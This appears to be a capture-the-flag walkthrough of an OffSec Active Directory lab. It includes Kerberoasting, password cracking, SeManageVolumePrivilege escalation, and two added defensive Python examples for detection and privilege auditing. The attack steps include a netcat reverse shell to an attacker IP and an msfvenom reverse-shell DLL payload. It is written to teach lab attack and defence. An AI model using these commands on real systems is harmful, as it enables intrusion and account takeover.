1. Reconnaissance
We begin with an nmap scan (run through the nmapAutomator wrapper):
sudo ./nmapAutomator.sh 192.168.247.147 all
Running all scans on 192.168.247.187
Host is likely running Unknown OS!
———————Starting Port Scan———————–
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
———————Starting Script Scan———————–
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Access The Event
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-07 07:06:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-07T07:06:45
|_ start_date: N/A
———————Starting Full Scan————————
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49697/tcp open unknown
49774/tcp open unknown
Making a script scan on extra ports: 5985, 9389, 49666, 49667, 49669, 49670, 49671, 49697, 49774
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49774/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
———————-Starting UDP Scan————————
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
Making a script scan on UDP ports: 53, 123, 389
PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
According to nmap, a web server is running on port 80.
When we browse to the website, we are presented with an event page that includes speakers, timetables, events, a gallery, and the ability to purchase tickets. The ticket-purchase option includes a feature for uploading images.
2. Foothold
From there we successfully obtain a reverse shell back to our Kali machine.
3. Privilege Escalation
After running linpeas.sh as the web user svc_apache we find no obvious privilege-escalation vector, but when we look through the user profile paths we find another account, svc_mssql.
Next, we try Kerberoasting with Rubeus:
PS C:\Users\Public> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
We can copy this hash to a file named svc_mssql_hash.
john --wordlist=/usr/share/wordlists/rockyou.txt svc_mssql_hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
trustno1 (?)
1g 0:00:00:00 DONE (2022-04-11 09:20) 100.0g/s 102400p/s 102400c/s 102400C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Using John the Ripper and the /usr/share/wordlists/rockyou.txt wordlist, we discover that the password for svc_mssql is trustno1.
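As the defender's counterpart to the roasting step above, here is an added detection example (not part of the original write-up) that flags the pattern it leaves in the domain controller's Security log: successful service-ticket requests (event ID 4769) issued with RC4 (etype 23, the type john reported) for user-owned SPNs, grouped by the requesting account. The sample records, their simplified key=value field names, the svc_backup and jdoe accounts and the client addresses are all constructed.

```python
import re

RC4_HMAC = "0x17"  # etype 23, the RC4 type reported by john above

# Constructed sample records in a simplified key=value form; a real feed
# would come from the DC's Security log (event ID 4769, "A Kerberos service
# ticket was requested"), whose field names are longer than these.
SAMPLE_4769 = [
    "EventID=4769 Account=svc_apache@ACCESS.OFFSEC Service=svc_mssql Etype=0x17 Status=0x0 Client=192.168.247.100",
    "EventID=4769 Account=svc_apache@ACCESS.OFFSEC Service=svc_backup Etype=0x17 Status=0x0 Client=192.168.247.100",
    "EventID=4769 Account=svc_apache@ACCESS.OFFSEC Service=SERVER$ Etype=0x12 Status=0x0 Client=192.168.247.100",
    "EventID=4769 Account=jdoe@ACCESS.OFFSEC Service=krbtgt Etype=0x17 Status=0x0 Client=192.168.247.50",
    "EventID=4769 Account=jdoe@ACCESS.OFFSEC Service=svc_mssql Etype=0x12 Status=0x0 Client=192.168.247.50",
    "EventID=4768 Account=jdoe@ACCESS.OFFSEC Service=krbtgt Etype=0x12 Status=0x0 Client=192.168.247.50",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_record(line):
    """Split one key=value record into a dict."""
    return dict(FIELD_RE.findall(line))


def is_roastable_request(rec):
    """True for a successful TGS request for a user-owned SPN that was
    issued with RC4, the ticket type an offline cracker can attack cheaply."""
    svc = rec.get("Service", "")
    return (rec.get("EventID") == "4769"
            and rec.get("Status") == "0x0"
            and rec.get("Etype") == RC4_HMAC
            and not svc.endswith("$")        # computer accounts: long random keys
            and svc.lower() != "krbtgt")     # TGT traffic is expected


def kerberoast_alerts(lines, min_services=2):
    """Group RC4 service-ticket requests by requesting account and return the
    accounts that asked for tickets to min_services or more distinct SPNs,
    the pattern a bulk roasting tool such as Rubeus produces."""
    per_account = {}
    for line in lines:
        rec = parse_record(line)
        if is_roastable_request(rec):
            per_account.setdefault(rec["Account"], set()).add(rec["Service"])
    return {acct: sorted(svcs) for acct, svcs in per_account.items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    for acct, svcs in kerberoast_alerts(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {acct}: {', '.join(svcs)}")
```

The same log review also shows the fix: service accounts with AES-only keys and long random passwords (or gMSAs) produce no 0x17 tickets and nothing that rockyou could crack.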
Next we will use RunAsCs to get shell as svc_mssql on the target. Let’s grab a copy of Invoke-RunasCs.ps1 from the repository and upload it to the target by using the webshell.
In our shell on the target system, we import the Invoke-RunasCs function and then test it by running whoami.
Then we start netcat on our Kali machine and use Invoke-RunasCs to execute nc.exe on the target, initiating a reverse shell connection.
PS C:\xampp\htdocs\uploads> Invoke-RunasCs svc_mssql trustno1 'c:/xampp/htdocs/uploads/nc.exe 192.168.118.23 4444 -e cmd.exe'
We have successfully compromised the svc_mssql account!
Enumerating privileges, we discover that SeManageVolumePrivilege is assigned to the svc_mssql account. We can take advantage of this privilege to get Administrator access to the target.
References:
https://twitter.com/0gtweet/status/1303432729854439425
https://github.com/CsEnox/SeManageVolumeExploit
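Before moving on to the exploit, here is an added audit example (not part of the original write-up) for the defensive side of this finding: it parses the [Privilege Rights] section of a `secedit /export /cfg <file>` security-template export and reports every holder of a sensitive user right, such as SeManageVolumePrivilege, that is not in the expected default set. The export excerpt, the domain SID, the RID given to svc_mssql and the SID-to-name map are constructed; the expected-holder table reflects member-server defaults and is an assumption to tune per host.

```python
# Default holders on a member server (Administrators, plus Backup Operators for
# backup/restore); DCs also grant some of these to operator groups, so tune this.
EXPECTED_HOLDERS = {
    "SeManageVolumePrivilege": {"S-1-5-32-544"},
    "SeDebugPrivilege": {"S-1-5-32-544"},
    "SeTakeOwnershipPrivilege": {"S-1-5-32-544"},
    "SeLoadDriverPrivilege": {"S-1-5-32-544"},
    "SeBackupPrivilege": {"S-1-5-32-544", "S-1-5-32-551"},
    "SeRestorePrivilege": {"S-1-5-32-544", "S-1-5-32-551"},
}

# Constructed excerpt in the format written by `secedit /export /cfg <file>`.
# The domain SID and the RID assigned to svc_mssql are made up for the example.
SAMPLE_EXPORT = """\
[Privilege Rights]
SeManageVolumePrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeDebugPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
"""

# Constructed SID-to-name map; on a real host resolve SIDs with the AD module.
SID_NAMES = {"S-1-5-21-1111111111-2222222222-3333333333-1105": "ACCESS\\svc_mssql"}

def parse_privilege_rights(text):
    """Return {privilege: [sid, ...]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if in_section and "=" in line:
            name, _, holders = line.partition("=")
            rights[name.strip()] = [h.strip().lstrip("*")
                                    for h in holders.split(",") if h.strip()]
    return rights

def unexpected_holders(text, sid_names=SID_NAMES):
    """List (privilege, holder) pairs that fall outside EXPECTED_HOLDERS."""
    findings = []
    for priv, holders in parse_privilege_rights(text).items():
        expected = EXPECTED_HOLDERS.get(priv)
        if expected is None:
            continue  # not a privilege this audit tracks
        findings.extend((priv, sid_names.get(sid, sid))
                        for sid in holders if sid not in expected)
    return findings
```

Any finding is a user right to remove through Local Security Policy or the GPO that granted it; a service account that does not manage disks has no need for SeManageVolumePrivilege.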
4. Exploiting SeManageVolumePrivilege
According to this GitHub repository:
This exploit grants full permission on C:\ drive for all users on the machine.
- Enables the privilege in the token
- Creates handle to \\.\C: with SYNCHRONIZE | FILE_TRAVERSE
- Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545
Let’s grab the compiled executable from the releases page.
We upload SeManageVolumeExploit.exe to the target and execute it. After execution, we discover that the Builtin Users group has full permissions on the Windows folder.
C:\xampp\htdocs\uploads>whoami
access\svc_mssql
C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe
Then we generate a tzres.dll payload with msfvenom:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.153 LPORT=6666 -f dll -o tzres.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll
Next, we transfer the tzres.dll file to the target machine.